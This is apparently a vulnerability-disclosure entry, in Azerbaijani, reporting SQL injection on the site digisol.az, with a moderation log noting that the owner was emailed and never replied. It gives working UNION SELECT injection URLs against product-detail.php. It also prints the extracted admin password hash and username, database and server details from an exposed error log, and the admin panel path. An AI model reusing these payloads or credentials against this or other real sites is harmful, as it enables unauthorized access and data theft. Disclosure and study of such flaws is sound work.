SQL Injection

digisol.az 05 Noyabr 2017, 20:48

Ətraflı məlumat

Saytda SQL İnjection mövcuddur.
Bu boşluqdan istifadə edərək saytda yerləşdirilmiş məlumatları (Parollar, saytın strukturu və s.) əldə etmək olar
Version~10.0.30-MariaDB-0+deb8u2~ (Debian)
User~digisol_use230@localhost
Primary Database~digisol_db216
No Of Databases~2
No Of Tables~12
http://digisol.az/product-detail.php?id=-73'+UNION+ALL+SELECT+1,2,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+tb_admini--+-'
Password: 477b20d49dddd4f70c3e683f5b379595
http://digisol.az/product-detail.php?id=-73%27+UNION+ALL+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+tb_admini--+-%27
Login razim
Admin panelin heç bir toolla tapmaq mümkün olmadı ancaq Error log faylını yükləyərək olan problemlərdən paneli görmək mümkündür (digisol.az/error_log)

[14-May-2016 04:30:07 America/Chicago] PHP Warning: mysql_connect(): Access denied for user 'wwwwebde_digisol'@'localhost' (using password: YES) in /home/wwwwebde/public_html/demo/digisol/hsadmin/Config.php on line 7

Panel /hsadmin

Qeydlər

  • 06 Mart 2018, 10:54
    Boşluğun statusu
    Mənbədən cavab gəlmədi

  • 07 Noyabr 2017, 16:50
    Boşluğun statusu
    Mənbəyə boşluq haqqında e-poçt göndərildi

  • 07 Noyabr 2017, 16:37
    Boşluğa bal verildi
    Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 5 bal təyin etdi

  • 07 Noyabr 2017, 16:37
    Boşluğun statusu
    Moderator tərəfindən təsdiq edildi

  • 05 Noyabr 2017, 20:48
    Boşluq əlavə edildi
    Boşluq BUGemota əlavə edildi